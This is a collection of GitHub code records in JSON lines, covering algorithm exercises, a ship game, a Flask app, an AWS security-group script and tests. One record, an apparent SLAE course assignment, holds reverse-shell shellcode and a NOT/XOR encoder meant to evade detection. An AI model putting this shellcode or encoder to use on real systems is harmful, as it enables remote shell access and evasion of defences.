https://leetcode.com/problems/reshape-the-matrix/\n\nfrom typing import List\n\n\nclass Solution:\n def matrixReshape(self, mat: List[List[int]], r: int, c: int) -> List[List[int]]:\n if (len(mat) * len(mat[0])) / c != r:\n return mat\n\n ans: List[List[int]] = []\n\n [row, col] = [0, 0]\n\n for i in range(r):\n ans.append([])\n for _ in range(c):\n ans[i].append(mat[row][col])\n if col == len(mat[row]) - 1:\n row += 1\n col = 0\n else:\n col += 1\n\n return ans\n","repo_name":"kitanoyoru/compscie","sub_path":"leetcode/566. 
Reshape the Matrix/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"33"} +{"seq_id":"14006271088","text":"def quick_sort(arr):\n if not isinstance(arr, list):\n raise ValueError(\"Input must be a list\")\n \n if len(arr) <= 1:\n return arr\n\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n\n return quick_sort(left) + middle + quick_sort(right)\n\nif __name__ == \"__main__\":\n # Test cases for input validation\n # try:\n # quick_sort(\"invalid_input\")\n # except ValueError as e:\n # print(f\"Error: {e}\")\n \n try:\n quick_sort([])\n except ValueError as e:\n print(f\"Error: {e}\")\n\n # Test cases for the Quick Sort algorithm\n arr1 = [3, 6, 8, 10, 1, 2, 1]\n arr2 = [9, 7, 5, 3, 1]\n arr3 = [1, 2, 3, 4, 5]\n\n print(quick_sort(arr1)) # Should print [1, 1, 2, 3, 6, 8, 10]\n print(quick_sort(arr2)) # Should print [1, 3, 5, 7, 9]\n print(quick_sort(arr3)) # Should print [1, 2, 3, 4, 5]\n","repo_name":"pgioun/algorithms","sub_path":"quick_sort/quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"32653321589","text":"# Anton Dimitrov\n# CS 152 Project 11\n# Fall 2019\n#\n# Template by Bruce A Maxwell\n# Fall 2018\n# CS 152 Project 11\n#\n# Make an Asteroids-like ship move around\n#\n# slightly modified by Eric Aaron, Fall 2018, Spring 2019\nimport math\nimport random\nimport time\nimport graphicsPlus as gr\nimport physics_objects as pho\nimport collision as coll\n\ndef buildObstacles(win):\n\t'''Create all of the obstacles in the scene and put them in a list;\n\teach obstacle is a Thing-inheriting object (Block, Hexagon, Rotating Block, Eye)\n different obstacles have different elasticities for exciting yet balanced bounciness!'''\n\thexagon = pho.Hexagon(win)\n\thexagon.setPosition(25, 25)\n\thexagon.elasticity = 0.5\n\t# rotating block\n\trblock1 = pho.RotatingBlock(win, 25, 5)\n\trblock1.setRotVelocity(10)\n\trblock1.setAngle(20)\n\trblock1.elasticity = 1.2\n\t# regular blocks\n\tblock2 = pho.Block(win)\n\tblock2.setPosition(40, 10)\n\tblock3 = pho.Block(win)\n\tblock3.setPosition(25, 40)\n\tblock4 = pho.Block(win)\n\tblock4.setPosition(10, 10)\n\t# eyes \n\teye1 = pho.Eye(win)\n\teye1.setPosition(10, 35)\n\teye1.elasticity = 0.8\n\teye2 = pho.Eye(win)\n\teye2.setPosition(40, 35)\n\teye2.elasticity = 0.8\n\t\n\tobstacles = [hexagon, rblock1, block2, block3, block4, eye1, eye2]\n\n # Return the list of Things\n\treturn obstacles\n\t\ndef StartScreen(win):\n\t'''Creates the initial stage that gives the players basic instructions'''\n\tblock = pho.Block(win, 25, 25, 50, 50)\n\tblock.setColor((255,20,147))\n\t# welcome message\n\twelcoming = gr.Text(gr.Point(250,150), \"Welcome to SpaceStar Catcher\")\n\twelcoming.setStyle('bold italic')\n\twelcoming.setSize(10)\n\t# instructions to procede \n\texitInstruct = gr.Text(gr.Point(250,220), \"You may press the Q key to quit at anytime\")\n\tcontinueInstruct = gr.Text(gr.Point(250,300), \"Press on the screen to create a ball and then score 10 hits\")\n\tcontinueInstruct.setSize(10)\n\tkeyUse = gr.Text(gr.Point(250,400), \"Player 1: Use the W, E, and S keys\tPlayer 2 : Use the Left, Right, and Space keys\")\n\tkeyUse.setSize(10)\n\t# draw start screen items \n\tblock.draw()\n\ttext = [welcoming, 
exitInstruct, continueInstruct, keyUse]\n\tfor item in text:\n\t\titem.draw(win)\n\twin.update()\n\treturn [block, welcoming, exitInstruct, continueInstruct, keyUse]\ndef undrawStartScreen(win, items):\n\t'''Removes the start screen from the window'''\n\tfor item in items:\n\t\titem.undraw()\ndef Gameplay(win):\n\t'''draws the Start Screen and undraws it when the user clicks inside the window;\n\ton the spot clicked, a ball is created and the game begins with the while loop;\n\twhen a player reaches 10 points, the loop/game ends;\n\tthe string with the winning player is returned'''\n\t# score points \n\tscore_p1 = 0\n\tscore_p2 = 0\n\t# variable used in rotation\n\tgamma = 10\n\t# variable used in acceleration\n\tdelta = 1\n\t# world wrap variables \n\twinWidth = 50\n\twinHeight = 50\n\t# framing\n\tdt = 0.01\n\tframe = 0\n\t# draw the obstacles defined in buildObstacles()\n\tobstacles = buildObstacles(win)\n\tfor item in obstacles:\n\t\titem.draw()\n\t# make one ship for each player, draw it (2-player game extension #1)\n\tship1 = pho.Ship(win, 20, 25)\n\tship1.draw()\n\tship1.setRotVelocity(20)\n\tship2 = pho.Ship(win, 30, 25)\n\tship2.draw()\n\tship2.setRotVelocity(20)\n\t# display the start screen with instructions\n\tstartItems = StartScreen(win)\n\t# make a ball \t\n\tclick = win.getMouse()\n\tball = pho.Ball(win)\n\tball.setPosition(click.getX()/ball.scale, (win.getHeight() - click.getY())/ball.scale)\n\tball.setVelocity(random.random()*10, random.random()*10)\n\tball.setAcceleration(0, -10)\n\tball.draw()\t\n\twhile True:\n\t\t# exit start screen upon clicking the mouse\n\t\tif click:\n\t\t\tundrawStartScreen(win, startItems)\n\t\tkey = win.checkKey()\n\t\t# exit game upon pressing 'q'\n\t\tif key == 'q':\n\t\t\tbreak\n\t\t#_____________________________________________________________________________PLAYER 1 SHIP MOVEMENT \n\t\t# if the user hits the 'a' key (spin left)\n\t\tif key == 'a':\n \t# set the rotational velocity to the old rotational velocity plus gamma\n\t\t\tship1.setRotVelocity(ship1.getRotVelocity() + gamma)\n \t# call the ship's setFlickerOn method with no arguments\n\t\t\tship1.setFlickerOn()\n \t# elif the user hits the 'd' key (spin right )\n\t\telif key == 'd':\n \t# set the rotational velocity to the old rotational veloity minus gamma\n\t\t\tship1.setRotVelocity(ship1.getRotVelocity() - gamma)\n \t# call the ship's setFlickerOn method with no arguments\n\t\t\tship1.setFlickerOn()\n\t\t# elif the user types 'w' (acceleration)\n\t\telif key == 'w': \n \t# assign to a the ship's current angle (getAngle)\n\t\t\ta1 = ship1.getAngle()\n \t# assign to theta the result of multiplying a by math.pi and dividing by 180\n\t\t\ttheta = a1*math.pi/100\n \t# assign to v the ship's current velocity (getVelocity)\n\t\t\tv1 = ship1.getVelocity()\n \t# set the ship's velocity to it's new values\n \t# The new X velocity is v_new_x = v_old_x + cos(theta) * delta\n\t\t\tv1_new_x = v1[0] + math.cos(theta)*delta\n \t# The new Y velocity is v_new_y = v_old_y + sin(theta) * delta\n\t\t\tv1_new_y = v1[1] + math.sin(theta)*delta\n\t\t\tship1.setVelocity(v1_new_x, v1_new_y)\n \t# call the ship's setFlickerOn method with no arguments\n\t\t\tship1.setFlickerOn()\n\t\t# assign to moveit the value False\n\t\tmoveit1 = False\n \t# assign to p the ship's current position. 
You might want to cast it to a list.\n\t\tp1 = list(ship1.getPosition())\n \t# if the x coordinate is less than 0\n\t\tif p1[0] < 0:\n \t# add winWidth to the x coordinate\n\t\t\tp1[0] = p1[0] + winWidth\n \t# assign to moveit the value True\n\t\t\tmoveit1 = True\n \t# elif the x coordinate is greater than winWidth\n\t\telif p1[0] > winWidth:\n \t# subtract winWidth from the x coordinate\n\t\t\tp1[0] = p1[0] - winWidth \n \t# assign to moveit the value True\n\t\t\tmoveit1 = True\n \t# if the y coordinate is less than 0\n\t\tif p1[1] < 0:\n \t# add winHeight to the y coordinate\n\t\t\tp1[1] = p1[1] + winHeight\n \t# assign to moveit the value True\n\t\t\tmoveit1 = True\n \t# elif the y coordinate is greater than winHeight\n\t\telif p1[1] > winHeight:\n \t# subtract winHeight from the y coordinate\n\t\t\tp1[1] = p1[1] - winHeight\n \t# assign to moveit the value True\n\t\t\tmoveit1 = True\n \t# if moveit:\n\t\tif moveit1:\n \t# set the ship's position to p\n\t\t\tship1.setPosition(p1[0], p1[1])\t\t\t\t\t\t\t\n\t\t#__________________________________________________________________________PLAYER 2 SHIP MOVEMENT\n\t\t# if the user hits the 'Left' key\n\t\tif key == 'Left':\n \t# set the rotational velocity to the old rotational velocity plus gamma\n\t\t\tship2.setRotVelocity(ship2.getRotVelocity() + gamma)\n \t# call the ship's setFlickerOn method with no arguments\n\t\t\tship2.setFlickerOn()\n \t# elif the user hits the 'Right' key\n\t\telif key == 'Right':\n \t# set the rotational velocity to the old rotational veloity minus gamma\n\t\t\tship2.setRotVelocity(ship2.getRotVelocity() - gamma)\n \t# call the ship's setFlickerOn method with no arguments\n\t\t\tship2.setFlickerOn()\n\t\t# elif the user hits 'Up' (acceleration)\n\t\telif key == 'Up': \n \t# assign to a the ship's current angle (getAngle)\n\t\t\ta2 = ship2.getAngle()\n \t# assign to theta the result of multiplying a by math.pi and dividing by 180\n\t\t\ttheta = a2*math.pi/100\n \t# assign to v the ship's current velocity (getVelocity)\n\t\t\tv2 = ship2.getVelocity()\n \t# set the ship's velocity to it's new values\n \t# The new X velocity is v_new_x = v_old_x + cos(theta) * delta\n\t\t\tv2_new_x = v2[0] + math.cos(theta)*delta\n \t# The new Y velocity is v_new_y = v_old_y + sin(theta) * delta\n\t\t\tv2_new_y = v2[1] + math.sin(theta)*delta\n\t\t\tship2.setVelocity(v2_new_x, v2_new_y)\n \t# call the ship's setFlickerOn method with no arguments\n\t\t\tship2.setFlickerOn()\n\t\t# assign to moveit the value False\n\t\tmoveit2 = False\n \t# assign to p the ship's current position. 
You might want to cast it to a list.\n\t\tp2 = list(ship2.getPosition())\n \t# if the x coordinate is less than 0\n\t\tif p2[0] < 0:\n \t# add winWidth to the x coordinate\n\t\t\tp2[0] = p2[0] + winWidth\n \t# assign to moveit the value True\n\t\t\tmoveit2 = True\n \t# elif the x coordinate is greater than winWidth\n\t\telif p2[0] > winWidth:\n \t# subtract winWidth from the x coordinate\n\t\t\tp2[0] = p2[0] - winWidth\n \t# assign to moveit the value True\n\t\t\tmoveit2 = True\n \t# if the y coordinate is less than 0\n\t\tif p2[1] < 0:\n \t# add winHeight to the y coordinate\n\t\t\tp2[1] = p2[1] + winHeight\n \t# assign to moveit the value True\n\t\t\tmoveit2 = True\n \t# elif the y coordinate is greater than winHeight\n\t\telif p2[1] > winHeight:\n \t# subtract winHeight from the y coordinate\n\t\t\tp2[1] = p2[1] - winHeight\n \t# assign to moveit the value True\n\t\t\tmoveit2 = True\n \t# if moveit:\n\t\tif moveit2:\n \t# set the ship's position to p\n\t\t\tship2.setPosition(p2[0], p2[1])\n\t\t# address collision between ships\n\t\tcoll.collision(ship1, ship2, dt)\n\t\t# move ships + rotating block\n\t\tship1.update(dt)\n\t\tship2.update(dt)\n\t\tobstacles[1].rotate(4)\n\t\t#____________________________________________________________BALL INTERACTION WITH OBSTACLES AND SHIPS\n\t\t# if the ball is out of bounds, re-launch it randomly \n\t\t(ball_px, ball_py) = ball.getPosition()\n\t\tif ball_px*ball.scale < ball.radius*ball.scale or ball_px*ball.scale > win.getWidth() - ball.radius*ball.scale or ball_py*ball.scale < ball.radius*ball.scale or ball_py*ball.scale > win.getHeight() - ball.radius*ball.scale:\n\t\t\t# reposition the ball \n\t\t\tball.setPosition(random.randint(5, 45), random.randint(15,45))\n\t\t# collisions\n\t\t# if the player 1 collides with the ball\n\t\tif coll.collision(ball, ship1, dt):\n\t\t\t# add one point to player 1's score\n\t\t\tscore_p1 += 1\n\t\t\tball.setColor((255, 0, 0))\n\t\t# if the player 2 collides with the ball\n\t\telif coll.collision(ball, ship2, dt):\n\t\t\t# add one point to player 2's score\n\t\t\tscore_p2 += 1\n\t\t\tball.setColor((0, 0, 255))\n\t\t# assign to collided (with obstacles) the value False\n\t\tcollided = False\n # for each item in the shapes list\n\t\tfor item in obstacles:\n # if the result of calling the collision function with the ball and the obstacle item is True\n\t\t\tif coll.collision(ball, item, dt):\n\t\t\t\tcollided = True\t\n # if collided is equal to False\n\t\tif collided == False:\n # call the update method of the ball with dt as the time step\n\t\t\tball.update(dt)\n\t\t\t\n\t\t# update window\n\t\tframe += 1\n\t\tif frame % 10 == 0:\n\t\t\twin.update()\n\t\t\ttime.sleep(0.5*dt)\n\t\t\t\n\t\t# if either player scores 10, game is finished \n\t\tif score_p1 == 10:\n\t\t\twinner = \"Player 1\"\n\t\t\tbreak\n\t\telif score_p2 == 10:\n\t\t\twinner = \"Player 2\"\n\t\t\tbreak\n\t# undraw everything after game ends \n\tship1.undraw()\n\tship2.undraw()\n\tball.undraw()\n\tfor item in obstacles:\n\t\titem.undraw()\n\t# return the winning player \n\treturn winner\n\t\t\ndef EndScreen(win, winner):\n\t'''Creates the final stage that shows the winner;\n\tbased on the button pressed, the player:\n\tQ - playAgain = False\n\tR - playsAgain = True\n\tthe results (playAgain) is returned'''\n\tblock = pho.Block(win, 25, 25, 50, 50)\t\n\tblock.setColor((0,255,0))\n\t# winner announced \n\twinnerString = \"Winner is {}!\".format(winner)\n\twinnerText = gr.Text(gr.Point(250,150), winnerString)\n\twinnerText.setStyle('bold 
italic')\n\twinnerText.setSize(15)\n\t# instructions \n\tagainInstruct = gr.Text(gr.Point(250,300), \"Press R to play again\") # play again extension #2\n\tagainInstruct.setSize(10)\n\tquitGame = gr.Text(gr.Point(250,400), \"Press Q to quit\")\n\tquitGame.setSize(10)\n\t# draw start screen items \n\tblock.draw()\n\ttext = [winnerText, againInstruct, quitGame]\n\tfor item in text:\n\t\titem.draw(win)\n\t\t\n\t# update window with the end screen announcement + instructions\n\twin.update()\n\t\n\t# Press Q to exit or Press R to play again (extension #2)\n\twhile True:\n\t\tkey = win.checkKey()\n\t\t# if Q, does not play again / playAgain = False\n\t\tif key == 'q':\n\t\t\tplayAgain = False\n\t\t\tbreak\n\t\t# if R, plays again / playAgain = True \n\t\telif key == 'r':\n\t\t\tplayAgain = True\n\t\t\tbreak\n\t\ttime.sleep(0.05)\n\t# at the end, undraw the visuals in this screen \n\tfor item in text:\n\t\titem.undraw()\n\tblock.undraw()\n\treturn playAgain\n\ndef main():\n\t'''creates the window for the simulation'''\n\t# make a window\n\twin = gr.GraphWin('SpaceStar Catcher', 500, 500, False)\n\t# always play the first game \n\tplayAgain = True\n\twhile playAgain:\n\t\t# winner variable holds the string with the winning player\n\t\twinner = Gameplay(win) \n\t\t# playing again depends on the button pressed by the player (Q to exit, R to play again)\n\t\tplayAgain = EndScreen(win, winner)\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"atmosse/starships","sub_path":"ship-simple.py","file_name":"ship-simple.py","file_ext":"py","file_size_in_byte":12506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"15962108314","text":"from datetime import datetime\n\nimport github3.session\nfrom github3 import GitHub\n\nfrom .config import CONFIG\n\n\nGITHUB_SESSION = None\n\n\ndef get_session() -> GitHub:\n global GITHUB_SESSION\n\n if GITHUB_SESSION is not None:\n return GITHUB_SESSION\n\n token = CONFIG[\"github_token\"]\n\n # Increase read timeout for creating PRs with long bodies.\n sess = github3.session.GitHubSession(default_read_timeout=30)\n gh = GitHub(token=token, session=sess)\n rate_limit = gh.rate_limit()[\"rate\"]\n limit = rate_limit[\"limit\"]\n remaining = rate_limit[\"remaining\"]\n reset = datetime.utcfromtimestamp(rate_limit[\"reset\"])\n print(f\"{remaining}/{limit} rate limit remaining\")\n print(f\"Reset at {reset} UTC (in {reset - datetime.utcnow()})\")\n GITHUB_SESSION = gh\n return GITHUB_SESSION\n","repo_name":"esphome/esphome-release","sub_path":"esphomerelease/github.py","file_name":"github.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"33"} +{"seq_id":"39008702042","text":"total = 0\r\n\r\nwith open('basic_math_more.txt', 'r') as inp, open('flag.txt', 'w') as outp:\r\n for line in inp:\r\n try:\r\n num = long(line)\r\n total += num\r\n outp.write(line)\r\n except ValueError:\r\n print('{} is not a number!'.format(line))\r\n\r\nprint('Total of all numbers: {}'.format(total))","repo_name":"zard777/CTF_vault","sub_path":"NeverLAN2018/Scripting/SUM_basic_math_more.py","file_name":"SUM_basic_math_more.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"73287195294","text":"from sys import stdin\r\ndef chkSum(idx):\r\n res = 0\r\n if idx < 100:\r\n return idx\r\n res = 99\r\n for i in range (100, idx+1):\r\n if((int(str(i)[2]) 
- int(str(i)[1])) == (int(str(i)[1]) - int(str(i)[0]))):\r\n res = res + 1\r\n return res\r\nidx = int(stdin.readline())\r\nprint(chkSum(idx))","repo_name":"didue/algorithm-study","sub_path":"jeonghun/함수/1065.py","file_name":"1065.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"4385074695","text":"def print_iterator(it):\n for x in it:\n print(x, end=' ')\n print('\\n')\n\n\n# reversed string\nr = reversed('abc')\nprint(type(r))\nprint(r)\nprint_iterator(r)\n\n# reversed list\nr = reversed([1, 2, 3])\nprint_iterator(r)\n\n# reversed tuple\nr = reversed((1, 2, 3))\nprint_iterator(r)\n\n# reversed bytes\nr = reversed(bytes('abc', 'utf-8'))\nprint_iterator(r)\n\n# reversed bytearray\nr = reversed(bytearray('abc', 'utf-8'))\nprint_iterator(r)\n\n\n# object with __reversed__ method\nclass Data:\n name = ''\n\n def __init__(self, n):\n self.name = n\n\n def __reversed__(self):\n return reversed(self.name)\n\n\nd = Data('ABC')\n\nr = reversed(d)\n\nprint_iterator(r)\n\n\n# object supporting sequence protocol i.e.\n# implementing __len__() and __getitem__ method\nclass MyTupleWrapper:\n t = ()\n\n def __init__(self, tu):\n if not isinstance(tu, tuple):\n return ValueError('Only accepts tuple')\n self.t = tu\n\n def __len__(self):\n return len(self.t)\n\n def __getitem__(self, index):\n return self.t[index]\n\n\nmt = MyTupleWrapper((1, 2, 3, 4))\nr = reversed(mt)\nprint_iterator(r)\n","repo_name":"WebJournal/journaldev","sub_path":"Python-3/basic_examples/python_reversed_examples.py","file_name":"python_reversed_examples.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":1282,"dataset":"github-code","pt":"33"} +{"seq_id":"1546137382","text":"\"\"\"\n最佳买卖股票时机含冻结期\n\n链接:https://leetcode-cn.com/problems/best-time-to-buy-and-sell-stock-with-cooldown\n\n给定一个整数数组,其中第 i 个元素代表了第 i 天的股票价格 。\n\n设计一个算法计算出最大利润。在满足以下约束条件下,你可以尽可能地完成更多的交易(多次买卖一支股票):\n\n你不能同时参与多笔交易(你必须在再次购买前出售掉之前的股票)。\n\n卖出股票后,你无法在第二天买入股票 (即冷冻期为 1 天)。\n\n示例:\n输入: [1,2,3,0,2]\n输出: 3\n解释: 对应的交易状态为: [买入, 卖出, 冷冻期, 买入, 卖出]\n\n解法:\n1. 
动态规划(状态机)\n\n\"\"\"\nimport unittest\nfrom typing import List\n\n\nclass Solution:\n def max_profit(self, prices: List[int]) -> int:\n n = len(prices)\n dp_i_0, dp_i_1 = 0, float(\"-inf\")\n dp_pre_0 = 0 # 表示 dp[i-2][0]\n for i in range(n):\n tmp = dp_i_0\n dp_i_0 = max(dp_i_0, dp_i_1 + prices[i])\n dp_i_1 = max(dp_i_1, dp_pre_0 - prices[i])\n dp_pre_0 = tmp\n return dp_i_0\n\n\nclass Cases:\n def __init__(self, prices: List[int], want: int):\n self.prices: List[int] = prices\n self.want: int = want\n\n\nclass TestSolution(unittest.TestCase):\n def setUp(self) -> None:\n self.s = Solution()\n\n def test_max_profit(self):\n test_cases = (Cases([1, 2, 3, 0, 2], 3),)\n\n for tc in test_cases:\n output = self.s.max_profit(tc.prices)\n self.assertEqual(tc.want, output)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"Nigirimeshi/leetcode","sub_path":"0309_best-time-buy-and-sell-stock-with-cooldown.py","file_name":"0309_best-time-buy-and-sell-stock-with-cooldown.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"16077536115","text":"#!/Users/bogdan/.virtualenvs/lb/bin/python\nimport boto3\nimport requests\nimport argparse\nimport sys\nfrom botocore.exceptions import ClientError\n\n\ndef authorize():\n security_group.authorize_ingress(IpPermissions=[\n {\n 'FromPort': -1,\n 'ToPort': -1,\n 'IpProtocol': '-1',\n 'IpRanges': [\n {\n 'CidrIp': f'{current_ip}/{cidr_size}',\n 'Description': rule_desc\n },\n ],\n }\n ])\n\n\ndef revoke(ip):\n security_group.revoke_ingress(CidrIp=ip, IpProtocol='-1')\n\n\ndef get_current_ip():\n r = requests.get('http://ipv4.wtfismyip.com/json')\n if not r:\n print('Error: Cannot get current IP address.')\n sys.exit(1)\n\n response = r.json()\n current_ip = response['YourFuckingIPAddress']\n print(f'Current IP address: {current_ip}')\n\n return current_ip\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Authorize IP in AWS group')\n parser.add_argument('--clear-ip', action='store_true', help='Remove current/given IP from the security group')\n parser.add_argument('--ip', type=str, help='IP to whitelist')\n parser.add_argument('--group-id', default='sg-c9a04cb0', type=str, help='AWS group ID')\n parser.add_argument('--cidr-size', default=32, type=int, help='CIDR block size (default 32)')\n parser.add_argument('--rule-desc', default='Bogdan', type=str, help='Rule description')\n\n args = parser.parse_args()\n group_id = args.group_id\n cidr_size = args.cidr_size\n rule_desc = args.rule_desc.lower()\n \n # init\n ec2 = boto3.resource('ec2')\n security_group = ec2.SecurityGroup(group_id)\n\n if args.ip:\n current_ip = args.ip\n else:\n current_ip = get_current_ip()\n \n # clear current ip, if wanted\n if args.clear_ip is True:\n revoke(f'{current_ip}/{cidr_size}')\n sys.exit(0)\n \n ips = list(filter(lambda x: 'Description' in x and x['Description'].lower().startswith(rule_desc), \n security_group.ip_permissions[0]['IpRanges']))\n ips = [x['CidrIp'] for x in ips]\n if not ips:\n print('No IPs found with that description')\n \n for ip in ips:\n revoke(ip)\n \n try:\n authorize()\n except ClientError as e:\n if 'InvalidPermission.Duplicate' not in str(e):\n raise e\n if not ips: # fix\n revoke(f'{current_ip}/{cidr_size}')\n authorize()\n \n print(f'Successfully authorized IP: 
{current_ip}')\n","repo_name":"xbogdan/scripts","sub_path":"edit-access.py","file_name":"edit-access.py","file_ext":"py","file_size_in_byte":2547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"15155455226","text":"from shapeae import settings\nimport pytest\nimport json\nfrom pathlib import Path\n\ndef test_settings_default_values():\n with open(Path(__file__).parents[2].joinpath(\"default_params.json\"), 'r') as f:\n default_params = json.load(f)\n \n for (_k, _v) in default_params.items():\n assert getattr(settings, _k) == _v\n\ndef test_setting_values_with_object_attributes():\n _params = dict(\n path= \"path1\",\n result_path = \"path2\",\n pretrained_weights_path = \"path3\",\n random_seed = 42,\n batch_size = 10,\n epochs_ShapeAE = 100,\n epochs_cShapeAE = 1000,\n )\n settings.path = _params['path']\n settings.result_path = _params['result_path']\n settings.pretrained_weights_path = _params['pretrained_weights_path']\n settings.random_seed = _params['random_seed']\n settings.batch_size = _params['batch_size']\n settings.epochs_ShapeAE = _params['epochs_SHAPR']\n settings.epochs_cShapeAE = _params['epochs_cSHAPR']\n\n assert settings.path == _params['path']\n assert settings.result_path == _params['result_path']\n assert settings.pretrained_weights_path == _params['pretrained_weights_path']\n assert settings.random_seed == _params['random_seed']\n assert settings.batch_size == _params['batch_size']\n assert settings.epochs_ShapeAE == _params['epochs_SHAPR']\n assert settings.epochs_cShapeAE == _params['epochs_cSHAPR']\n\ndef test_setting_read_json():\n settings.read_json(Path(__file__).parents[1].joinpath(\"test_data/json\", \"settings_testing_params.json\"))\n\n\n assert settings.path == \"path1_json\"\n assert settings.result_path == \"path2_json\"\n assert settings.pretrained_weights_path == \"path3_json\"\n assert settings.random_seed == 21\n assert settings.batch_size == 5\n assert settings.epochs_ShapeAE == 50\n assert settings.epochs_cShapeAE == 500\n\n\n","repo_name":"marrlab/SHAPR_torch","sub_path":"shapr/tests/unit_tests/test_settings.py","file_name":"test_settings.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"33"} +{"seq_id":"72939820255","text":"import pandas as pd\nimport numpy as np\n\ndef to_polar(start, end):\n x1, y1 = start[0], start[1]\n x2, y2 = end[0], end[1]\n\n vec = np.array([x2 - x1, y2 - y1])\n\n delta_r = np.sqrt(vec[0] ** 2 + vec[1] ** 2)\n delta_phi = np.arctan2(vec[1], vec[0])\n\n return np.array([delta_r, delta_phi])\n\n\ndef dest_from_polar(start, polar):\n x_s, y_s = start[:, 0], start[:, 1]\n r, theta = polar[:, 0], polar[:, 1]\n\n x = r * np.cos(theta)\n y = r * np.sin(theta)\n\n x = x + x_s\n y = y + y_s\n\n return np.transpose(np.array([x, y]))\n\n\ndef is_nan(y):\n s = y.sum()\n return np.isnan(s.sum())\n\n\ndef remove_nan_values(df):\n mask3 = ~df[\"polar\"].apply(lambda x: is_nan(x))\n df = df[mask3]\n return df\n\n\ndef stack_and_reshape(m1, m2, m3):\n all_measures = np.stack([m1, m2, m3], axis=1)\n all_measures = all_measures.reshape(-1, 9)\n return np.array(all_measures)\n\n\ndef get_short_sequences(df, min_len, max_len):\n df[\"len\"] = df[\"acce\"].apply(lambda x: len(x))\n df = df[(df[\"len\"] >= min_len) & (df[\"len\"] < max_len)]\n return 
df","repo_name":"amnayk/indoorlocation","sub_path":"src/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"16065132708","text":"#!/usr/bin/python3\n# NX-Encoder.py\n# Author: Michael Norris\n\nimport random\n\n\ndef n_encode(bytes_obj):\n return [(~byte & 0xff) for byte in bytes_obj]\n\n\ndef x_encode(bytes_obj):\n return [(byte ^ xor_byte) for byte in bytes_obj]\n\n\ndef find_unused_byte(bytes_obj):\n byte_range = [i for i in range(256)]\n xor_list = [byte for byte in byte_range if byte not in bytes_obj]\n return random.choice(xor_list)\n\n\ndef format_shellcode(bytes_obj, hex_format=True):\n encoded = ''\n if hex_format:\n for byte in bytes_obj:\n encoded += '0x'\n encoded += '%02x,' % byte\n encoded = encoded[:-1]\n else:\n for byte in bytes_obj:\n encoded += '\\\\x'\n encoded += '%02x' % byte\n return encoded\n\n\ndef decode_shellcode(bytes_obj):\n return n_encode(x_encode(bytes_obj))\n\n\nshellcode = bytearray(b'\\x31\\xdb\\xf7\\xe3\\x53\\x43\\x53\\x6a\\x02\\x89\\xe1\\xb0\\x66\\xcd\\x80\\x93\\x59\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\x68\\x7f\\x00\\x00\\x01\\x68\\x02\\x00\\x11\\x5c\\x89\\xe1\\xb0\\x66\\x50\\x51\\x53\\xb3\\x03\\x89\\xe1\\xcd\\x80\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x52\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80')\n\nn_encoded = n_encode(shellcode)\n\nxor_byte = find_unused_byte(n_encoded)\nnx_encoded = x_encode(n_encoded)\n\ndelimiter = find_unused_byte(nx_encoded)\nnx_encoded.append(delimiter)\n\nformatted_shellcode = format_shellcode(nx_encoded)\n\nprint('Length: %d' % len(nx_encoded))\nprint('XOR Delimiter: ' + hex(delimiter))\nprint('XOR Byte: ' + hex(xor_byte))\nprint(formatted_shellcode)\n","repo_name":"norrismw/SLAE","sub_path":"assignments/assignment-4/NX-Encoder.py","file_name":"NX-Encoder.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"9870129868","text":"from flask import Flask, render_template, request\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n\n@app.route('/convert_time.py', methods=['POST'])\ndef convert_time():\n time = request.form['time']\n converted_time = convert_to_12_hour_format(time)\n return render_template('result.html', time=time, converted_time=converted_time)\n\n\ndef convert_to_12_hour_format(time):\n # Splitting the time into hours and minutes\n hours, minutes = time.split(':')\n\n # Converting hours to integer\n hours = int(hours)\n\n # Determining AM/PM\n if hours >= 12:\n period = 'PM'\n hours -= 12\n else:\n period = 'AM'\n\n # Handling special cases\n if hours == 0:\n hours = 12\n\n # Formatting the converted time\n converted_time = f'{hours}:{minutes} {period}'\n return converted_time\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"shreyasat27/python_2023","sub_path":"project 1 (clock_converter)/convert_time.py","file_name":"convert_time.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"40383324325","text":"import numpy as np\nimport pandas as pd\nfrom sklearn import svm\n\ndef get_best_acc(err):\n best = err.iloc[err[2].argmax()]\n return best[0], 